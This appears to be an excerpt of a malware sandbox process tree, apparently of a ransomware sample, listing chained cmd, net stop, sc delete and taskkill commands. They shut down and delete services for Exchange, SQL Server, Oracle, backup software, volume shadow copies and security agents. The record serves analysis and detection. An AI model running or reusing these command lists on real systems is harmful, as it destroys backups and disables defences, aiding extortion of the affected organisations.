    cmd /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop MSExchangeADTopology & @net stop MSExchangeAntispamUpdate & @net stop MSExchangeCompliance & @net stop MSExchangeDagMgmt & @net stop MSExchangeDelivery & @net stop MSExchangeDiagnostics & @net stop MSExchangeEdgeSync & @net stop MSExchangeFastSearch & @net stop MSExchangeFrontEndTransport & @net stop MSExchangeHM & @net stop MSSQL$SQL2008 & @net stop MSExchangeHMRecovery & @net stop MSExchangeImap4 & @net stop MSExchangeIMAP4BE & @net stop MSExchangeIS & @net stop MSExchangeMailboxAssistants & @net stop MSExchangeMailboxReplication & @net stop MSExchangeNotificationsBroker & @net stop MSExchangePop3 & @net stop MSExchangePOP3BE & @net stop MSExchangeRepl & @net stop MSExchangeRPC & @net stop MSExchangeServiceHost & @net stop MSExchangeSubmission & @net stop MSExchangeThrottling & @net stop MSExchangeTransport & @net stop MSExchangeTransportLogSearch & @net stop MSExchangeUM & @net stop MSExchangeUMCR & @net stop MySQL5_OA"
    3⤵
    PID:852
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeEdgeSync
      4⤵
      PID:2208
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeEdgeSync
        5⤵
        
        PID:2268
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeFastSearch
      4⤵
      PID:2716
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeFastSearch
        5⤵
        
        PID:2508
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeFrontEndTransport
      4⤵
      PID:2948
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeFrontEndTransport
        5⤵
        
        PID:2224
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeHM
      4⤵
      PID:3044
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeHM
        5⤵
        
        PID:2440
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$SQL2008
      4⤵
      PID:2348
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$SQL2008
        5⤵
        
        PID:1092
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeHMRecovery
      4⤵
      PID:2728
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeHMRecovery
        5⤵
        
        PID:3028
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeImap4
      4⤵
      PID:2652
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeImap4
        5⤵
        
        PID:2704
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeIMAP4BE
      4⤵
      PID:2628
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeIMAP4BE
        5⤵
        
        PID:2192
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeIS
      4⤵
      PID:2780
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeIS
        5⤵
        
        PID:2128
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeMailboxAssistants
      4⤵
      PID:2900
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDATAMCU & @sc delete RTCCDR & @sc delete ProjectEventService16 & @sc delete ProjectQueueService16 & @sc delete SPAdminV4 & @sc delete SPSearchHostController & @sc delete SPTimerV4 & @sc delete SPTraceV4 & @sc delete OSearch16 & @sc delete ProjectCalcService16 & @sc delete c2wts & @sc delete AppFabricCachingService & @sc delete ADWS & @sc delete MotionBoard57 & @sc delete MotionBoardRCService57 & @sc delete vsvnjobsvc & @sc delete VisualSVNServer & @sc delete "FlexNet Licensing Service 64" & @sc delete BestSyncSvc & @sc delete LPManager & @sc delete MediatekRegistryWriter & @sc delete RaAutoInstSrv_RT2870 & @sc delete CobianBackup10 & @sc delete SQLANYs_sem5 & @sc delete CASLicenceServer & @sc delete SQLService & @sc delete semwebsrv & @sc delete TbossSystem & @sc delete ErpEnvSvc & @sc delete Mysoft.Autoupgrade.DispatchService & @sc delete Mysoft.Autoupgrade.UpdateService & @sc delete Mysoft.Config.WindowsService & @sc delete Mysoft.DataCenterService & @sc delete Mysoft.SchedulingService & @sc delete Mysoft.Setup.InstallService & @sc delete MysoftUpdate & @sc delete edr_monitor & @sc delete abs_deployer & @sc delete savsvc & @sc delete ShareBoxMonitorService & @sc delete ShareBoxService & @sc delete CloudExchangeService & @sc delete "U8WorkerService2" & @sc delete CIS & @sc delete EASService & @sc delete KICkSvr & @sc delete "OSP Service" & @sc delete U8SmsSrv & @sc delete OfficeClearCache & @sc delete TurboCRM70 & @sc delete U8DispatchService & @sc delete U8EISService & @sc delete U8EncryptService & @sc delete U8GCService & @sc delete U8KeyManagePool & @sc delete "U8MPool" & @sc delete U8SCMPool & @sc delete U8SLReportService & @sc delete U8TaskService & @sc delete "U8WebPool" & @sc delete UFAllNet & @sc delete UFReportService & @sc delete UTUService & @sc delete "U8WorkerService1""
    3⤵
    PID:1604
  - - C:\Windows\SysWOW64\sc.exe
      sc delete vsvnjobsvc
      4⤵
      PID:2976
  - - C:\Windows\SysWOW64\sc.exe
      sc delete VisualSVNServer
      4⤵
      PID:2584
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "FlexNet Licensing Service 64"
      4⤵
      PID:2628
  - - C:\Windows\SysWOW64\sc.exe
      sc delete BestSyncSvc
      4⤵
      Launches sc.exe
      PID:468
  - - C:\Windows\SysWOW64\sc.exe
      sc delete LPManager
      4⤵
      PID:1472
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MediatekRegistryWriter
      4⤵
      Launches sc.exe
      PID:2872
  - - C:\Windows\SysWOW64\sc.exe
      sc delete RaAutoInstSrv_RT2870
      4⤵
      Launches sc.exe
      PID:2304
  - - C:\Windows\SysWOW64\sc.exe
      sc delete CobianBackup10
      4⤵
      PID:2944
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLANYs_sem5
      4⤵
      Launches sc.exe
      PID:1492
  - - C:\Windows\SysWOW64\sc.exe
      sc delete CASLicenceServer
      4⤵
      PID:1932
  - - C:\Windows\SysWOW64\sc.exe
      sc delete SQLService
      4⤵
      Launches sc.exe
      PID:2852
  - - C:\Windows\SysWOW64\sc.exe
      sc delete semwebsrv
      4⤵
      PID:1316
  - - C:\Windows\SysWOW64\sc.exe
      sc delete TbossSystem
      4⤵
      Launches sc.exe
      PID:668
  - - C:\Windows\SysWOW64\sc.exe
      sc delete ErpEnvSvc
      4⤵
      PID:1348
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.Autoupgrade.DispatchService
      4⤵
      PID:2880
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.Autoupgrade.UpdateService
      4⤵
      PID:284
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.Config.WindowsService
      4⤵
      Launches sc.exe
      PID:2244
  - - C:\Windows\SysWOW64\sc.exe
      sc delete Mysoft.DataCenterService
      4⤵
      Launches sc.exe
      PID:2104
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusbrdsrv & @sc delete "ZTE USBIP Client Guard" & @sc delete "ZTE USBIP Client" & @sc delete "ZTE FileTranS" & @sc delete wwbizsrv & @sc delete qemu-ga & @sc delete AlibabaProtect & @sc delete ZTEVdservice & @sc delete kbasesrv & @sc delete MMRHookService & @sc delete OracleJobSchedulerORCL & @sc delete IpOverUsbSvc & @sc delete MsDtsServer100 & @sc delete KuaiYunTools & @sc delete KMSELDI & @sc delete btPanel & @sc delete Protect_2345Explorer & @sc delete 2345PicSvc & @sc delete vmware-converter-agent & @sc delete vmware-converter-server & @sc delete vmware-converter-worker & @sc delete QQCertificateService & @sc delete OracleRemExecService & @sc delete GPSDaemon & @sc delete GPSUserSvr & @sc delete GPSDownSvr & @sc delete GPSStorageSvr & @sc delete GPSDataProcSvr & @sc delete GPSGatewaySvr & @sc delete GPSMediaSvr & @sc delete GPSLoginSvr & @sc delete GPSTomcat6 & @sc delete GPSMysqld & @sc delete GPSFtpd & @sc delete "Zabbix Agent" & @sc delete BackupExecAgentAccelerator & @sc delete bedbg & @sc delete BackupExecDeviceMediaService & @sc delete BackupExecRPCService & @sc delete BackupExecAgentBrowser & @sc delete BackupExecJobEngine & @sc delete BackupExecManagementService & @sc delete MDM & @sc delete TxQBService & @sc delete Gailun_Downloader & @sc delete RemoteAssistService & @sc delete YunService & @sc delete Serv-U & @sc delete "EasyFZS Server" & @sc delete "Rpc Monitor" & @sc delete OpenFastAssist & @sc delete "Nuo Update Monitor" & @sc delete "Daemon Service" & @sc delete asComSvc & @sc delete OfficeUpdateService & @sc delete RtcSrv & @sc delete RTCASMCU & @sc delete FTA & @sc delete MASTER & @sc delete NscAuthService & @sc delete MSCRMUnzipService & @sc delete MSCRMAsyncService$maintenance"
    3⤵
    PID:952
  - - C:\Windows\SysWOW64\sc.exe
      sc delete vmware-converter-agent
      4⤵
      Launches sc.exe
      PID:2148
  - - C:\Windows\SysWOW64\sc.exe
      sc delete vmware-converter-server
      4⤵
      PID:2896
  - - C:\Windows\SysWOW64\sc.exe
      sc delete vmware-converter-worker
      4⤵
      Launches sc.exe
      PID:284
  - - C:\Windows\SysWOW64\sc.exe
      sc delete QQCertificateService
      4⤵
      PID:2100
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleRemExecService
      4⤵
      PID:2372
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSDaemon
      4⤵
      Launches sc.exe
      PID:2924
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSUserSvr
      4⤵
      PID:1644
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSDownSvr
      4⤵
      PID:2720
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSStorageSvr
      4⤵
      PID:2260
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSDataProcSvr
      4⤵
      PID:2532
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSGatewaySvr
      4⤵
      Launches sc.exe
      PID:2328
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSMediaSvr
      4⤵
      PID:580
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSLoginSvr
      4⤵
      PID:636
  - - C:\Windows\SysWOW64\sc.exe
      sc delete GPSTomcat6
      4⤵
      Launches sc.exe
      PID:3020
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"
    3⤵
    PID:1176
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService"
    3⤵
    PID:1620
  - - C:\Windows\SysWOW64\sc.exe
      sc delete 360EntClientSvc
      4⤵
      Launches sc.exe
      PID:1068
  - - C:\Windows\SysWOW64\sc.exe
      sc delete NFWebServer
      4⤵
      PID:2952
  - - C:\Windows\SysWOW64\sc.exe
      sc delete wampapache
      4⤵
      PID:2360
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSSEARCH
      4⤵
      Launches sc.exe
      PID:2668
  - - C:\Windows\SysWOW64\sc.exe
      sc delete msftesql
      4⤵
      PID:2316
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "SyncBASE Service"
      4⤵
      Launches sc.exe
      PID:1284
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleDBConcoleorcl
      4⤵
      PID:2172
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleJobSchedulerORCL
      4⤵
      PID:1248
  - - C:\Windows\SysWOW64\sc.exe
      sc delete OracleMTSRecoveryService
      4⤵
      Launches sc.exe
      PID:2964
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""
    3⤵
    PID:1704
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  2⤵
  PID:2212
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  2⤵
  PID:1276
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  2⤵
  PID:2268

C:\Windows\SysWOW64\sc.exe
sc delete OracleVssWriterORCL
1⤵
- Launches sc.exe
PID:1752

C:\Windows\SysWOW64\net.exe
net stop HaoZipSvc
1⤵
PID:628
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop HaoZipSvc
  2⤵
  PID:2088

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop UIODetect
1⤵
PID:2168

C:\Windows\SysWOW64\net.exe
net stop "igfxCUIService2.0.0.0"
1⤵
PID:2332
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop "igfxCUIService2.0.0.0"
  2⤵
  PID:2348

C:\Windows\SysWOW64\net.exe
net stop Realtek11nSU
1⤵
PID:2444
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop Realtek11nSU
  2⤵
  PID:2480

C:\Windows\SysWOW64\sc.exe
sc delete ImeDictUpdateService
1⤵
PID:2552

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop xenlite
1⤵
PID:2704

C:\Windows\SysWOW64\net.exe
net stop XenSvc
1⤵
PID:2792
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop XenSvc
  2⤵
  PID:2824

C:\Windows\SysWOW64\sc.exe
sc delete ftusbrdsrv
1⤵
- Launches sc.exe
PID:2924

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Apache2.2
1⤵
PID:2916

C:\Windows\SysWOW64\sc.exe
sc delete RTCIMMCU
1⤵
PID:2948

C:\Windows\SysWOW64\net.exe
net stop Apache2.4
1⤵
PID:2956
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop Apache2.4
  2⤵
  PID:1588

C:\Windows\SysWOW64\sc.exe
sc delete UIODetect
1⤵
PID:2940

C:\Windows\SysWOW64\sc.exe
sc delete allpass_redisservice_port21160
1⤵
PID:2968

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VMUSBArbService
1⤵
PID:2900

C:\Windows\SysWOW64\net.exe
net stop VMAuthdService
1⤵
PID:3004
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop VMAuthdService
  2⤵
  PID:3064

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "memcached Server"
1⤵
PID:2888

C:\Windows\SysWOW64\sc.exe
sc delete ImeDictUpdateService
1⤵
- Launches sc.exe
PID:2880

C:\Windows\SysWOW64\net.exe
net stop VMUSBArbService
1⤵
PID:2872

C:\Windows\SysWOW64\net.exe
net stop Apache2.2
1⤵
PID:2864
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop FirebirdGuardianDeafaultInstance
  2⤵
  PID:2364

C:\Windows\SysWOW64\sc.exe
sc delete "ZTE USBIP Client Guard"
1⤵
PID:3016

C:\Windows\SysWOW64\net.exe
net stop "memcached Server"
1⤵
PID:2856

C:\Windows\SysWOW64\sc.exe
sc delete RTCMEETINGMCU
1⤵
PID:2832

C:\Windows\SysWOW64\sc.exe
sc delete RTCDATAMCU
1⤵
PID:3032

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop vss
1⤵
PID:2816

C:\Windows\SysWOW64\sc.exe
sc delete "Flash Helper Service"
1⤵
- Launches sc.exe
PID:3048

C:\Windows\SysWOW64\sc.exe
sc delete "wanxiao-monitor"
1⤵
- Launches sc.exe
PID:3056

C:\Windows\SysWOW64\sc.exe
sc delete WebAttendServer
1⤵
PID:2808

C:\Windows\SysWOW64\net.exe
net stop "Synology Drive VSS Service x64"
1⤵
PID:1068
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop "Synology Drive VSS Service x64"
  2⤵
  PID:1956

C:\Windows\SysWOW64\sc.exe
sc delete ftusbrdwks
1⤵
- Launches sc.exe
PID:2800

C:\Windows\SysWOW64\sc.exe
sc delete MCService
1⤵
- Launches sc.exe
PID:2780

C:\Windows\SysWOW64\sc.exe
sc delete "ZTE USBIP Client"
1⤵
PID:2388

C:\Windows\SysWOW64\sc.exe
sc delete RTCCDR
1⤵
PID:2384

C:\Windows\SysWOW64\sc.exe
sc delete VMAuthdService
1⤵
- Launches sc.exe
PID:2436

C:\Windows\SysWOW64\sc.exe
sc delete RtcQms
1⤵
- Launches sc.exe
PID:2688

C:\Windows\SysWOW64\net.exe
net stop xenlite
1⤵
PID:2664

C:\Windows\SysWOW64\sc.exe
sc delete TCPIDDAService
1⤵
- Launches sc.exe
PID:2656

C:\Windows\SysWOW64\sc.exe
sc delete XT800Service_Personal
1⤵
- Launches sc.exe
PID:2648

C:\Windows\SysWOW64\sc.exe
sc delete "UtilDev Web Server Pro"
1⤵
- Launches sc.exe
PID:2632

C:\Windows\SysWOW64\net.exe
net stop wanxiao-monitor
1⤵
PID:2360
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop wanxiao-monitor
  2⤵
  PID:2448

C:\Windows\SysWOW64\sc.exe
sc delete "Kiwi Syslog Server"
1⤵
PID:2484

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop U8WorkerService2
1⤵
PID:2624

C:\Windows\SysWOW64\net.exe
net stop UFIDAWebService
1⤵
PID:2432
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop UFIDAWebService
  2⤵
  PID:2736

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TeamViewer8
1⤵
PID:2592

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM BackupExec.exe /F
1⤵
- Kills process with taskkill
PID:2576

C:\Windows\SysWOW64\net.exe
net stop U8WorkerService2
1⤵
PID:2560

C:\Windows\SysWOW64\sc.exe
sc delete RTCAVMCU
1⤵
PID:2532

C:\Windows\SysWOW64\sc.exe
sc delete K3MobileService
1⤵
- Launches sc.exe
PID:2524

C:\Windows\SysWOW64\sc.exe
sc delete "ZTE FileTranS"
1⤵
- Launches sc.exe
PID:2572

C:\Windows\SysWOW64\net.exe
net stop TeamViewer8
1⤵
- Discovers systems in the same network
PID:2512

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM pg_ctl.exe /F
1⤵
- Kills process with taskkill
PID:2504

C:\Windows\SysWOW64\sc.exe
sc delete FxService
1⤵
PID:2492

C:\Windows\SysWOW64\sc.exe
sc delete VMUSBArbService
1⤵
PID:2536

C:\Windows\SysWOW64\sc.exe
sc delete ProjectEventService16
1⤵
PID:2568

C:\Windows\SysWOW64\sc.exe
sc delete JhTask
1⤵
PID:2472

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM iexplore.exe /F
1⤵
- Kills process with taskkill
PID:2752

C:\Windows\SysWOW64\net.exe
net stop DellDRLogSvc
1⤵
PID:2692
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop DellDRLogSvc
  2⤵
  PID:2772

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM httpd.exe /F
1⤵
- Kills process with taskkill
PID:2652

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Att.exe /F
1⤵
- Kills process with taskkill
PID:2636

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM rcrelay.exe /F
1⤵
- Kills process with taskkill
PID:1648

C:\Windows\SysWOW64\sc.exe
sc delete "UWS HiPriv Services"
1⤵
- Launches sc.exe
PID:2164

C:\Windows\SysWOW64\sc.exe
sc delete RTCATS
1⤵
PID:2432

C:\Windows\SysWOW64\sc.exe
sc delete UI0Detect
1⤵
PID:2424

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM sqlservr.exe /F
1⤵
- Kills process with taskkill
PID:2408

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM VBoxSDS.exe /F
1⤵
- Kills process with taskkill
PID:2796

C:\Windows\SysWOW64\sc.exe
sc delete ProjectQueueService16
1⤵
- Launches sc.exe
PID:2780

C:\Windows\SysWOW64\sc.exe
sc delete wwbizsrv
1⤵
PID:2560

C:\Windows\SysWOW64\sc.exe
sc delete OracleVssWriterORCL
1⤵
PID:2392

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VMwareHostd
1⤵
PID:2384

C:\Windows\SysWOW64\net.exe
net stop MSComplianceAudit
1⤵
PID:2816
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop MSComplianceAudit
  2⤵
  PID:2924

C:\Windows\SysWOW64\sc.exe
sc delete VMwareHostd
1⤵
PID:2200

C:\Windows\SysWOW64\sc.exe
sc delete ftnlses3
1⤵
PID:2360

C:\Windows\SysWOW64\sc.exe
sc delete aspnet_state @sc delete Redis
1⤵
- Launches sc.exe
PID:2324

C:\Windows\SysWOW64\net.exe
net stop WebAttendServer
1⤵
PID:2888
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop WebAttendServer
  2⤵
  PID:2880

C:\Windows\SysWOW64\net.exe
net stop MSSQL$FE_EXPRESS
1⤵
PID:2808
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop MSSQL$FE_EXPRESS
  2⤵
  PID:2872

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM ThunderPlatform.exe /F
1⤵
- Kills process with taskkill
PID:2296

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop U8WorkerService1
1⤵
PID:2284

C:\Windows\SysWOW64\net.exe
net stop VMwareHostd
1⤵
PID:2256

C:\Windows\SysWOW64\net.exe
net stop mysqltransport
1⤵
PID:2900
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop mysqltransport
  2⤵
  PID:2968

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VMnetDHCP
1⤵
PID:3008

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeAntispamUpdate
1⤵
PID:3048

C:\Windows\SysWOW64\net.exe
net stop MSExchangeAntispamUpdate
1⤵
PID:3068

C:\Windows\SysWOW64\sc.exe
sc delete ZTEVdservice
1⤵
- Launches sc.exe
PID:1588

C:\Windows\SysWOW64\sc.exe
sc delete SPSearchHostController
1⤵
- Launches sc.exe
PID:3060

C:\Windows\SysWOW64\sc.exe
sc delete AlibabaProtect
1⤵
PID:2336

C:\Windows\SysWOW64\sc.exe
sc delete VmAgentDaemon
1⤵
- Launches sc.exe
PID:3032

C:\Windows\SysWOW64\net.exe
net stop VMnetDHCP
1⤵
PID:3036

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeADTopology
1⤵
PID:1276

C:\Windows\SysWOW64\net.exe
net stop JWRinfoClientService
1⤵
PID:2268
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop JWRinfoClientService
  2⤵
  PID:2680

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop JWEM3DBAUTORun
1⤵
PID:1144

C:\Windows\SysWOW64\net.exe
net stop MSExchangeADTopology
1⤵
PID:2028

C:\Windows\SysWOW64\net.exe
net stop MSExchangeCompliance
1⤵
PID:2980
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop MSExchangeCompliance
  2⤵
  PID:1084

C:\Windows\SysWOW64\net.exe
net stop JWEM3DBAUTORun
1⤵
PID:1152

C:\Windows\SysWOW64\sc.exe
sc delete SPAdminV4
1⤵
PID:2380

C:\Windows\SysWOW64\sc.exe
sc delete "vm-agent"
1⤵
- Launches sc.exe
PID:3020

C:\Windows\SysWOW64\sc.exe
sc delete qemu-ga
1⤵
- Launches sc.exe
PID:2372

C:\Windows\SysWOW64\net.exe
net stop FirebirdGuardianDeafaultInstance
1⤵
PID:2864

C:\Windows\SysWOW64\sc.exe
sc delete SPTimerV4
1⤵
PID:2452

C:\Windows\SysWOW64\net.exe
net stop "VMware NAT Service"
1⤵
PID:1904
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop "VMware NAT Service"
  2⤵
  PID:1340
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop SQLSERVERAGENT
  2⤵
  PID:1488

C:\Windows\SysWOW64\sc.exe
sc delete kbasesrv
1⤵
- Launches sc.exe
PID:2492

C:\Windows\SysWOW64\sc.exe
sc delete OpenSSHd
1⤵
- Launches sc.exe
PID:2488

C:\Windows\SysWOW64\sc.exe
sc delete REPLICA
1⤵
PID:2224

C:\Windows\SysWOW64\sc.exe
sc delete SPTraceV4
1⤵
- Launches sc.exe
PID:3000

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM SogouImeBroker.exe /F
1⤵
- Kills process with taskkill
PID:2596

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM java.exe /F
1⤵
- Kills process with taskkill
PID:2760

C:\Windows\SysWOW64\net.exe
net stop JWService
1⤵
PID:2748
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop JWService
  2⤵
  PID:2176

C:\Windows\SysWOW64\sc.exe
sc delete MMRHookService
1⤵
- Launches sc.exe
PID:2584

C:\Windows\SysWOW64\sc.exe
sc delete eSightService
1⤵
PID:2716

C:\Windows\SysWOW64\sc.exe
sc delete ftnlsv3
1⤵
PID:2212

C:\Windows\SysWOW64\sc.exe
sc delete EnergyDataService
1⤵
PID:2200

C:\Windows\SysWOW64\sc.exe
sc delete OracleServiceORCL
1⤵
- Launches sc.exe
PID:2188

C:\Windows\SysWOW64\net.exe
net stop MSExchangeDagMgmt
1⤵
PID:1068
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop MSExchangeDagMgmt
  2⤵
  PID:2008

C:\Windows\SysWOW64\net.exe
net stop Tomcat8
1⤵
PID:1976
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop Tomcat8
  2⤵
  PID:2124

C:\Windows\SysWOW64\sc.exe
sc delete OSearch16
1⤵
PID:1400

C:\Windows\SysWOW64\net.exe
net stop UIODetect
1⤵
PID:2140

C:\Windows\SysWOW64\net.exe
net stop U8WorkerService1
1⤵
PID:2124

C:\Windows\SysWOW64\sc.exe
sc delete apachezt
1⤵
- Launches sc.exe
PID:1796

C:\Windows\SysWOW64\sc.exe
sc delete OracleJobSchedulerORCL
1⤵
PID:2148

C:\Windows\SysWOW64\net.exe
net stop Service2
1⤵
PID:2572
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop Service2
  2⤵
  PID:580

C:\Windows\SysWOW64\sc.exe
sc delete ProjectCalcService16
1⤵
PID:2444

C:\Windows\SysWOW64\sc.exe
sc delete Jenkins
1⤵
- Launches sc.exe
PID:2812

C:\Windows\SysWOW64\sc.exe
sc delete IpOverUsbSvc
1⤵
PID:2520

C:\Windows\SysWOW64\net.exe
net stop MSExchangeDelivery
1⤵
PID:2632
